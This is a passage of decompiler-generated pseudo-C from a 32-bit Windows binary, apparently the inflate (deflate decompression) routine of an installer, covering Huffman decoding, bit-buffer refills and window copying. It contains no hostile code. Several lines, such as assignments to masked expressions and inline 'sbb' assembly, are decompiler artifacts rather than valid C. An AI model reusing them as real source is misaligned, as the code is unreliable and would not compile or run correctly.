                                                                                    							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                    								goto L68;
                                                                                    							}
                                                                                    							L61:
                                                                                    							while(1) {
                                                                                    								L64:
                                                                                    								if(__ebx >= 3) {
                                                                                    									break;
                                                                                    								}
                                                                                    								L62:
                                                                                    								if( *(__ebp - 0x34) == 0) {
                                                                                    									goto L182;
                                                                                    								}
                                                                                    								L63:
                                                                                    								__eax =  *(__ebp - 0x38);
                                                                                    								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    								__ecx = __ebx;
                                                                                    								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    								__ebx = __ebx + 8;
                                                                                    							}
                                                                                    							L65:
                                                                                    							__ecx = __esi[2];
                                                                                    							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                                    							__ebx = __ebx - 3;
                                                                                    							_t108 = __ecx + 0x408408; // 0x121110
                                                                                    							__ecx =  *_t108;
                                                                                    							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                                    							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                                    							__ecx = __esi[1];
                                                                                    							__esi[2] = __esi[2] + 1;
                                                                                    							__eax = __esi[2];
                                                                                    							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                                    							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                                    								goto L64;
                                                                                    							}
                                                                                    							L66:
                                                                                    							while(1) {
                                                                                    								L68:
                                                                                    								if(__esi[2] >= 0x13) {
                                                                                    									break;
                                                                                    								}
                                                                                    								L67:
                                                                                    								_t119 = __esi[2] + 0x408408; // 0x4000300
                                                                                    								__eax =  *_t119;
                                                                                    								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                                    								_t126 =  &(__esi[2]);
                                                                                    								 *_t126 = __esi[2] + 1;
                                                                                    							}
                                                                                    							L69:
                                                                                    							__ecx = __ebp - 8;
                                                                                    							__edi =  &(__esi[0x143]);
                                                                                    							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                                    							__eax = 0;
                                                                                    							 *(__ebp - 8) = 0;
                                                                                    							__eax =  &(__esi[3]);
                                                                                    							 *__edi = 7;
                                                                                    							__eax = E0040711C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                                    							if(__eax != 0) {
                                                                                    								L72:
                                                                                    								 *__esi = 0x11;
                                                                                    								while(1) {
                                                                                    									L180:
                                                                                    									_t396 =  *_t446;
                                                                                    									if(_t396 > 0xf) {
                                                                                    										break;
                                                                                    									}
                                                                                    									L1:
                                                                                    									switch( *((intOrPtr*)(_t396 * 4 +  &M00407074))) {
                                                                                    										case 0:
                                                                                    											L101:
                                                                                    											__eax = __esi[4] & 0x000000ff;
                                                                                    											__esi[3] = __esi[4] & 0x000000ff;
                                                                                    											__eax = __esi[5];
                                                                                    											__esi[2] = __esi[5];
                                                                                    											 *__esi = 1;
                                                                                    											goto L102;
                                                                                    										case 1:
                                                                                    											L102:
                                                                                    											__eax = __esi[3];
                                                                                    											while(1) {
                                                                                    												L105:
                                                                                    												__eflags = __ebx - __eax;
                                                                                    												if(__ebx >= __eax) {
                                                                                    													break;
                                                                                    												}
                                                                                    												L103:
                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                    													goto L182;
                                                                                    												}
                                                                                    												L104:
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                    												__ecx = __ebx;
                                                                                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    												__ebx = __ebx + 8;
                                                                                    												__eflags = __ebx;
                                                                                    											}
                                                                                    											L106:
                                                                                    											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                                                    											__eax = __eax &  *(__ebp - 0x40);
                                                                                    											__ecx = __esi[2];
                                                                                    											__eax = __esi[2] + __eax * 4;
                                                                                    											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                    											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                    											__ecx =  *__eax & 0x000000ff;
                                                                                    											__eflags = __ecx;
                                                                                    											if(__ecx != 0) {
                                                                                    												L108:
                                                                                    												__eflags = __cl & 0x00000010;
                                                                                    												if((__cl & 0x00000010) == 0) {
                                                                                    													L110:
                                                                                    													__eflags = __cl & 0x00000040;
                                                                                    													if((__cl & 0x00000040) == 0) {
                                                                                    														goto L125;
                                                                                    													}
                                                                                    													L111:
                                                                                    													__eflags = __cl & 0x00000020;
                                                                                    													if((__cl & 0x00000020) == 0) {
                                                                                    														goto L9;
                                                                                    													}
                                                                                    													L112:
                                                                                    													 *__esi = 7;
                                                                                    													goto L180;
                                                                                    												}
                                                                                    												L109:
                                                                                    												__esi[2] = __ecx;
                                                                                    												__esi[1] = __eax;
                                                                                    												 *__esi = 2;
                                                                                    												goto L180;
                                                                                    											}
                                                                                    											L107:
                                                                                    											__esi[2] = __eax;
                                                                                    											 *__esi = 6;
                                                                                    											goto L180;
                                                                                    										case 2:
                                                                                    											L113:
                                                                                    											__eax = __esi[2];
                                                                                    											while(1) {
                                                                                    												L116:
                                                                                    												__eflags = __ebx - __eax;
                                                                                    												if(__ebx >= __eax) {
                                                                                    													break;
                                                                                    												}
                                                                                    												L114:
                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                    													goto L182;
                                                                                    												}
                                                                                    												L115:
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                    												__ecx = __ebx;
                                                                                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    												__ebx = __ebx + 8;
                                                                                    												__eflags = __ebx;
                                                                                    											}
                                                                                    											L117:
                                                                                    											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                    											__esi[1] = __esi[1] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                    											__ecx = __eax;
                                                                                    											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    											__ebx = __ebx - __eax;
                                                                                    											__eflags = __ebx;
                                                                                    											__eax = __esi[4] & 0x000000ff;
                                                                                    											__esi[3] = __esi[4] & 0x000000ff;
                                                                                    											__eax = __esi[6];
                                                                                    											__esi[2] = __esi[6];
                                                                                    											 *__esi = 3;
                                                                                    											goto L118;
                                                                                    										case 3:
                                                                                    											L118:
                                                                                    											__eax = __esi[3];
                                                                                    											while(1) {
                                                                                    												L121:
                                                                                    												__eflags = __ebx - __eax;
                                                                                    												if(__ebx >= __eax) {
                                                                                    													break;
                                                                                    												}
                                                                                    												L119:
                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                    													goto L182;
                                                                                    												}
                                                                                    												L120:
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                    												__ecx = __ebx;
                                                                                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    												__ebx = __ebx + 8;
                                                                                    												__eflags = __ebx;
                                                                                    											}
                                                                                    											L122:
                                                                                    											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                                                    											__eax = __eax &  *(__ebp - 0x40);
                                                                                    											__ecx = __esi[2];
                                                                                    											__eax = __esi[2] + __eax * 4;
                                                                                    											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                    											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                    											__ecx =  *__eax & 0x000000ff;
                                                                                    											__eflags = __cl & 0x00000010;
                                                                                    											if((__cl & 0x00000010) == 0) {
                                                                                    												L124:
                                                                                    												__eflags = __cl & 0x00000040;
                                                                                    												if((__cl & 0x00000040) != 0) {
                                                                                    													goto L9;
                                                                                    												}
                                                                                    												L125:
                                                                                    												__esi[3] = __ecx;
                                                                                    												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                                    												__esi[2] = __eax;
                                                                                    												goto L180;
                                                                                    											}
                                                                                    											L123:
                                                                                    											__esi[2] = __ecx;
                                                                                    											__esi[3] = __eax;
                                                                                    											 *__esi = 4;
                                                                                    											goto L180;
                                                                                    										case 4:
                                                                                    											L126:
                                                                                    											__eax = __esi[2];
                                                                                    											while(1) {
                                                                                    												L129:
                                                                                    												__eflags = __ebx - __eax;
                                                                                    												if(__ebx >= __eax) {
                                                                                    													break;
                                                                                    												}
                                                                                    												L127:
                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                    													goto L182;
                                                                                    												}
                                                                                    												L128:
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                    												__ecx = __ebx;
                                                                                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    												__ebx = __ebx + 8;
                                                                                    												__eflags = __ebx;
                                                                                    											}
                                                                                    											L130:
                                                                                    											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                    											__esi[3] = __esi[3] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                    											__ecx = __eax;
                                                                                    											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    											__ebx = __ebx - __eax;
                                                                                    											__eflags = __ebx;
                                                                                    											 *__esi = 5;
                                                                                    											goto L131;
                                                                                    										case 5:
                                                                                    											L131:
                                                                                    											__eax =  *(__ebp - 0x30);
                                                                                    											__edx = __esi[3];
                                                                                    											__eax = __eax - __esi;
                                                                                    											__ecx = __eax - __esi - 0x1ba0;
                                                                                    											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                                    											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                                    												__ecx = __eax;
                                                                                    												__ecx = __eax - __edx;
                                                                                    												__eflags = __ecx;
                                                                                    											} else {
                                                                                    												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                                    												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                                    												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                                    											}
                                                                                    											__eflags = __esi[1];
                                                                                    											 *(__ebp - 0x20) = __ecx;
                                                                                    											if(__esi[1] != 0) {
                                                                                    												L135:
                                                                                    												__edi =  *(__ebp - 0x2c);
                                                                                    												do {
                                                                                    													L136:
                                                                                    													__eflags = __edi;
                                                                                    													if(__edi != 0) {
                                                                                    														goto L152;
                                                                                    													}
                                                                                    													L137:
                                                                                    													__edi = __esi[0x26e8];
                                                                                    													__eflags = __eax - __edi;
                                                                                    													if(__eax != __edi) {
                                                                                    														L143:
                                                                                    														__esi[0x26ea] = __eax;
                                                                                    														__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                                                                                    														__eax = __esi[0x26ea];
                                                                                    														__ecx = __esi[0x26e9];
                                                                                    														__eflags = __eax - __ecx;
                                                                                    														 *(__ebp - 0x30) = __eax;
                                                                                    														if(__eax >= __ecx) {
                                                                                    															__edi = __esi[0x26e8];
                                                                                    															__edi = __esi[0x26e8] - __eax;
                                                                                    															__eflags = __edi;
                                                                                    														} else {
                                                                                    															__ecx = __ecx - __eax;
                                                                                    															__edi = __ecx - __eax - 1;
                                                                                    														}
                                                                                    														__edx = __esi[0x26e8];
                                                                                    														__eflags = __eax - __edx;
                                                                                    														 *(__ebp - 8) = __edx;
                                                                                    														if(__eax == __edx) {
                                                                                    															__edx =  &(__esi[0x6e8]);
                                                                                    															__eflags = __ecx - __edx;
                                                                                    															if(__ecx != __edx) {
                                                                                    																__eax = __edx;
                                                                                    																__eflags = __eax - __ecx;
                                                                                    																 *(__ebp - 0x30) = __eax;
                                                                                    																if(__eax >= __ecx) {
                                                                                    																	__edi =  *(__ebp - 8);
                                                                                    																	__edi =  *(__ebp - 8) - __eax;
                                                                                    																	__eflags = __edi;
                                                                                    																} else {
                                                                                    																	__ecx = __ecx - __eax;
                                                                                    																	__edi = __ecx;
                                                                                    																}
                                                                                    															}
                                                                                    														}
                                                                                    														__eflags = __edi;
                                                                                    														if(__edi == 0) {
                                                                                    															goto L183;
                                                                                    														} else {
                                                                                    															goto L152;
                                                                                    														}
                                                                                    													}
                                                                                    													L138:
                                                                                    													__ecx = __esi[0x26e9];
                                                                                    													__edx =  &(__esi[0x6e8]);
                                                                                    													__eflags = __ecx - __edx;
                                                                                    													if(__ecx == __edx) {
                                                                                    														goto L143;
                                                                                    													}
                                                                                    													L139:
                                                                                    													__eax = __edx;
                                                                                    													__eflags = __eax - __ecx;
                                                                                    													if(__eax >= __ecx) {
                                                                                    														__edi = __edi - __eax;
                                                                                    														__eflags = __edi;
                                                                                    													} else {
                                                                                    														__ecx = __ecx - __eax;
                                                                                    														__edi = __ecx;
                                                                                    													}
                                                                                    													__eflags = __edi;
                                                                                    													if(__edi == 0) {
                                                                                    														goto L143;
                                                                                    													}
                                                                                    													L152:
                                                                                    													__ecx =  *(__ebp - 0x20);
                                                                                    													 *__eax =  *__ecx;
                                                                                    													__eax = __eax + 1;
                                                                                    													__ecx = __ecx + 1;
                                                                                    													__edi = __edi - 1;
                                                                                    													__eflags = __ecx - __esi[0x26e8];
                                                                                    													 *(__ebp - 0x30) = __eax;
                                                                                    													 *(__ebp - 0x20) = __ecx;
                                                                                    													 *(__ebp - 0x2c) = __edi;
                                                                                    													if(__ecx == __esi[0x26e8]) {
                                                                                    														__ecx =  &(__esi[0x6e8]);
                                                                                    														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                                                    													}
                                                                                    													_t357 =  &(__esi[1]);
                                                                                    													 *_t357 = __esi[1] - 1;
                                                                                    													__eflags =  *_t357;
                                                                                    												} while ( *_t357 != 0);
                                                                                    											}
                                                                                    											goto L23;
                                                                                    										case 6:
                                                                                    											L156:
                                                                                    											__eax =  *(__ebp - 0x2c);
                                                                                    											__edi =  *(__ebp - 0x30);
                                                                                    											__eflags = __eax;
                                                                                    											if(__eax != 0) {
                                                                                    												L172:
                                                                                    												__cl = __esi[2];
                                                                                    												 *__edi = __cl;
                                                                                    												__edi = __edi + 1;
                                                                                    												__eax = __eax - 1;
                                                                                    												 *(__ebp - 0x30) = __edi;
                                                                                    												 *(__ebp - 0x2c) = __eax;
                                                                                    												goto L23;
                                                                                    											}
                                                                                    											L157:
                                                                                    											__ecx = __esi[0x26e8];
                                                                                    											__eflags = __edi - __ecx;
                                                                                    											if(__edi != __ecx) {
                                                                                    												L163:
                                                                                    												__esi[0x26ea] = __edi;
                                                                                    												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                                                                                    												__edi = __esi[0x26ea];
                                                                                    												__ecx = __esi[0x26e9];
                                                                                    												__eflags = __edi - __ecx;
                                                                                    												 *(__ebp - 0x30) = __edi;
                                                                                    												if(__edi >= __ecx) {
                                                                                    													__eax = __esi[0x26e8];
                                                                                    													__eax = __esi[0x26e8] - __edi;
                                                                                    													__eflags = __eax;
                                                                                    												} else {
                                                                                    													__ecx = __ecx - __edi;
                                                                                    													__eax = __ecx - __edi - 1;
                                                                                    												}
                                                                                    												__edx = __esi[0x26e8];
                                                                                    												__eflags = __edi - __edx;
                                                                                    												 *(__ebp - 8) = __edx;
                                                                                    												if(__edi == __edx) {
                                                                                    													__edx =  &(__esi[0x6e8]);
                                                                                    													__eflags = __ecx - __edx;
                                                                                    													if(__ecx != __edx) {
                                                                                    														__edi = __edx;
                                                                                    														__eflags = __edi - __ecx;
                                                                                    														 *(__ebp - 0x30) = __edi;
                                                                                    														if(__edi >= __ecx) {
                                                                                    															__eax =  *(__ebp - 8);
                                                                                    															__eax =  *(__ebp - 8) - __edi;
                                                                                    															__eflags = __eax;
                                                                                    														} else {
                                                                                    															__ecx = __ecx - __edi;
                                                                                    															__eax = __ecx;
                                                                                    														}
                                                                                    													}
                                                                                    												}
                                                                                    												__eflags = __eax;
                                                                                    												if(__eax == 0) {
                                                                                    													goto L183;
                                                                                    												} else {
                                                                                    													goto L172;
                                                                                    												}
                                                                                    											}
                                                                                    											L158:
                                                                                    											__eax = __esi[0x26e9];
                                                                                    											__edx =  &(__esi[0x6e8]);
                                                                                    											__eflags = __eax - __edx;
                                                                                    											if(__eax == __edx) {
                                                                                    												goto L163;
                                                                                    											}
                                                                                    											L159:
                                                                                    											__edi = __edx;
                                                                                    											__eflags = __edi - __eax;
                                                                                    											if(__edi >= __eax) {
                                                                                    												__ecx = __ecx - __edi;
                                                                                    												__eflags = __ecx;
                                                                                    												__eax = __ecx;
                                                                                    											} else {
                                                                                    												__eax = __eax - __edi;
                                                                                    												__eax = __eax - 1;
                                                                                    											}
                                                                                    											__eflags = __eax;
                                                                                    											if(__eax != 0) {
                                                                                    												goto L172;
                                                                                    											} else {
                                                                                    												goto L163;
                                                                                    											}
                                                                                    										case 7:
                                                                                    											L173:
                                                                                    											__eflags = __ebx - 7;
                                                                                    											if(__ebx > 7) {
                                                                                    												__ebx = __ebx - 8;
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                                                    												_t380 = __ebp - 0x38;
                                                                                    												 *_t380 =  *(__ebp - 0x38) - 1;
                                                                                    												__eflags =  *_t380;
                                                                                    											}
                                                                                    											goto L175;
                                                                                    										case 8:
                                                                                    											L4:
                                                                                    											while(_t425 < 3) {
                                                                                    												if( *(_t448 - 0x34) == 0) {
                                                                                    													goto L182;
                                                                                    												} else {
                                                                                    													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                                                    													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                                                    													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                                                    													_t425 = _t425 + 8;
                                                                                    													continue;
                                                                                    												}
                                                                                    											}
                                                                                    											_t425 = _t425 - 3;
                                                                                    											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                                                    											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                                                    											asm("sbb ecx, ecx");
                                                                                    											_t408 = _t406 >> 1;
                                                                                    											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                                                    											if(_t408 == 0) {
                                                                                    												L24:
                                                                                    												 *_t446 = 9;
                                                                                    												_t436 = _t425 & 0x00000007;
                                                                                    												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                                                    												_t425 = _t425 - _t436;
                                                                                    												goto L180;
                                                                                    											}
                                                                                    											L6:
                                                                                    											_t411 = _t408 - 1;
                                                                                    											if(_t411 == 0) {
                                                                                    												L13:
                                                                                    												__eflags =  *0x42e3a8;
                                                                                    												if( *0x42e3a8 != 0) {
                                                                                    													L22:
                                                                                    													_t412 =  *0x40a42c; // 0x9
                                                                                    													_t446[4] = _t412;
                                                                                    													_t413 =  *0x40a430; // 0x5
                                                                                    													_t446[4] = _t413;
                                                                                    													_t414 =  *0x42d224; // 0x0
                                                                                    													_t446[5] = _t414;
                                                                                    													_t415 =  *0x42d220; // 0x0
                                                                                    													_t446[6] = _t415;
                                                                                    													L23:
                                                                                    													 *_t446 =  *_t446 & 0x00000000;
                                                                                    													goto L180;
                                                                                    												} else {
                                                                                    													_t26 = _t448 - 8;
                                                                                    													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                                                    													__eflags =  *_t26;
                                                                                    													_t416 = 0x42d228;
                                                                                    													goto L15;
                                                                                    													L20:
                                                                                    													 *_t416 = _t438;
                                                                                    													_t416 = _t416 + 4;
                                                                                    													__eflags = _t416 - 0x42d6a8;
                                                                                    													if(_t416 < 0x42d6a8) {
                                                                                    														L15:
                                                                                    														__eflags = _t416 - 0x42d464;
                                                                                    														_t438 = 8;
                                                                                    														if(_t416 > 0x42d464) {
                                                                                    															__eflags = _t416 - 0x42d628;
                                                                                    															if(_t416 >= 0x42d628) {
                                                                                    																__eflags = _t416 - 0x42d688;
                                                                                    																if(_t416 < 0x42d688) {
                                                                                    																	_t438 = 7;
                                                                                    																}
                                                                                    															} else {
                                                                                    																_t438 = 9;
                                                                                    															}
                                                                                    														}
                                                                                    														goto L20;
                                                                                    													} else {
                                                                                    														E0040711C(0x42d228, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d224, 0x40a42c, 0x42db28, _t448 - 8);
                                                                                    														_push(0x1e);
                                                                                    														_pop(_t440);
                                                                                    														_push(5);
                                                                                    														_pop(_t419);
                                                                                    														memset(0x42d228, _t419, _t440 << 2);
                                                                                    														_t450 = _t450 + 0xc;
                                                                                    														_t442 = 0x42d228 + _t440;
                                                                                    														E0040711C(0x42d228, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d220, 0x40a430, 0x42db28, _t448 - 8);
                                                                                    														 *0x42e3a8 =  *0x42e3a8 + 1;
                                                                                    														__eflags =  *0x42e3a8;
                                                                                    														goto L22;
                                                                                    													}
                                                                                    												}
                                                                                    											}
                                                                                    											L7:
                                                                                    											_t423 = _t411 - 1;
                                                                                    											if(_t423 == 0) {
                                                                                    												 *_t446 = 0xb;
                                                                                    												goto L180;
                                                                                    											}
                                                                                    											L8:
                                                                                    											if(_t423 != 1) {
                                                                                    												goto L180;
                                                                                    											}
                                                                                    											goto L9;
                                                                                    										case 9:
                                                                                    											while(1) {
                                                                                    												L27:
                                                                                    												__eflags = __ebx - 0x20;
                                                                                    												if(__ebx >= 0x20) {
                                                                                    													break;
                                                                                    												}
                                                                                    												L25:
                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                    													goto L182;
                                                                                    												}
                                                                                    												L26:
                                                                                    												__eax =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    												__ecx = __ebx;
                                                                                    												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    												__ebx = __ebx + 8;
                                                                                    												__eflags = __ebx;
                                                                                    											}
                                                                                    											L28:
                                                                                    											__eax =  *(__ebp - 0x40);
                                                                                    											__ebx = 0;
                                                                                    											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                                    											 *(__ebp - 0x40) = 0;
                                                                                    											__eflags = __eax;
                                                                                    											__esi[1] = __eax;
                                                                                    											if(__eax == 0) {
                                                                                    												goto L53;
                                                                                    											}
                                                                                    											L29:
                                                                                    											_push(0xa);
                                                                                    											_pop(__eax);
                                                                                    											goto L54;
                                                                                    										case 0xa:
                                                                                    											L30:
                                                                                    											__eflags =  *(__ebp - 0x34);
                                                                                    											if( *(__ebp - 0x34) == 0) {
                                                                                    												goto L182;
                                                                                    											}
                                                                                    											L31:
                                                                                    											__eax =  *(__ebp - 0x2c);
                                                                                    											__eflags = __eax;
                                                                                    											if(__eax != 0) {
                                                                                    												L48:
                                                                                    												__eflags = __eax -  *(__ebp - 0x34);
                                                                                    												if(__eax >=  *(__ebp - 0x34)) {
                                                                                    													__eax =  *(__ebp - 0x34);
                                                                                    												}
                                                                                    												__ecx = __esi[1];
                                                                                    												__eflags = __ecx - __eax;
                                                                                    												__edi = __ecx;
                                                                                    												if(__ecx >= __eax) {
                                                                                    													__edi = __eax;
                                                                                    												}
                                                                                    												__eax = E00405C4B( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                                    												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                                    												_t80 =  &(__esi[1]);
                                                                                    												 *_t80 = __esi[1] - __edi;
                                                                                    												__eflags =  *_t80;
                                                                                    												if( *_t80 == 0) {
                                                                                    													L53:
                                                                                    													__eax = __esi[0x145];
                                                                                    													L54:
                                                                                    													 *__esi = __eax;
                                                                                    												}
                                                                                    												goto L180;
                                                                                    											}
                                                                                    											L32:
                                                                                    											__ecx = __esi[0x26e8];
                                                                                    											__edx =  *(__ebp - 0x30);
                                                                                    											__eflags = __edx - __ecx;
                                                                                    											if(__edx != __ecx) {
                                                                                    												L38:
                                                                                    												__esi[0x26ea] = __edx;
                                                                                    												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                                                                                    												__edx = __esi[0x26ea];
                                                                                    												__ecx = __esi[0x26e9];
                                                                                    												__eflags = __edx - __ecx;
                                                                                    												 *(__ebp - 0x30) = __edx;
                                                                                    												if(__edx >= __ecx) {
                                                                                    													__eax = __esi[0x26e8];
                                                                                    													__eax = __esi[0x26e8] - __edx;
                                                                                    													__eflags = __eax;
                                                                                    												} else {
                                                                                    													__ecx = __ecx - __edx;
                                                                                    													__eax = __ecx - __edx - 1;
                                                                                    												}
                                                                                    												__edi = __esi[0x26e8];
                                                                                    												 *(__ebp - 0x2c) = __eax;
                                                                                    												__eflags = __edx - __edi;
                                                                                    												if(__edx == __edi) {
                                                                                    													__edx =  &(__esi[0x6e8]);
                                                                                    													__eflags = __edx - __ecx;
                                                                                    													if(__eflags != 0) {
                                                                                    														 *(__ebp - 0x30) = __edx;
                                                                                    														if(__eflags >= 0) {
                                                                                    															__edi = __edi - __edx;
                                                                                    															__eflags = __edi;
                                                                                    															__eax = __edi;
                                                                                    														} else {
                                                                                    															__ecx = __ecx - __edx;
                                                                                    															__eax = __ecx;
                                                                                    														}
                                                                                    														 *(__ebp - 0x2c) = __eax;
                                                                                    													}
                                                                                    												}
                                                                                    												__eflags = __eax;
                                                                                    												if(__eax == 0) {
                                                                                    													goto L183;
                                                                                    												} else {
                                                                                    													goto L48;
                                                                                    												}
                                                                                    											}
                                                                                    											L33:
                                                                                    											__eax = __esi[0x26e9];
                                                                                    											__edi =  &(__esi[0x6e8]);
                                                                                    											__eflags = __eax - __edi;
                                                                                    											if(__eax == __edi) {
                                                                                    												goto L38;
                                                                                    											}
                                                                                    											L34:
                                                                                    											__edx = __edi;
                                                                                    											__eflags = __edx - __eax;
                                                                                    											 *(__ebp - 0x30) = __edx;
                                                                                    											if(__edx >= __eax) {
                                                                                    												__ecx = __ecx - __edx;
                                                                                    												__eflags = __ecx;
                                                                                    												__eax = __ecx;
                                                                                    											} else {
                                                                                    												__eax = __eax - __edx;
                                                                                    												__eax = __eax - 1;
                                                                                    											}
                                                                                    											__eflags = __eax;
                                                                                    											 *(__ebp - 0x2c) = __eax;
                                                                                    											if(__eax != 0) {
                                                                                    												goto L48;
                                                                                    											} else {
                                                                                    												goto L38;
                                                                                    											}
                                                                                    										case 0xb:
                                                                                    											goto L56;
                                                                                    										case 0xc:
                                                                                    											L60:
                                                                                    											__esi[1] = __esi[1] >> 0xa;
                                                                                    											__eax = (__esi[1] >> 0xa) + 4;
                                                                                    											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                    												goto L68;
                                                                                    											}
                                                                                    											goto L61;
                                                                                    										case 0xd:
                                                                                    											while(1) {
                                                                                    												L93:
                                                                                    												__eax = __esi[1];
                                                                                    												__ecx = __esi[2];
                                                                                    												__edx = __eax;
                                                                                    												__eax = __eax & 0x0000001f;
                                                                                    												__edx = __edx >> 5;
                                                                                    												__eax = __edx + __eax + 0x102;
                                                                                    												__eflags = __esi[2] - __eax;
                                                                                    												if(__esi[2] >= __eax) {
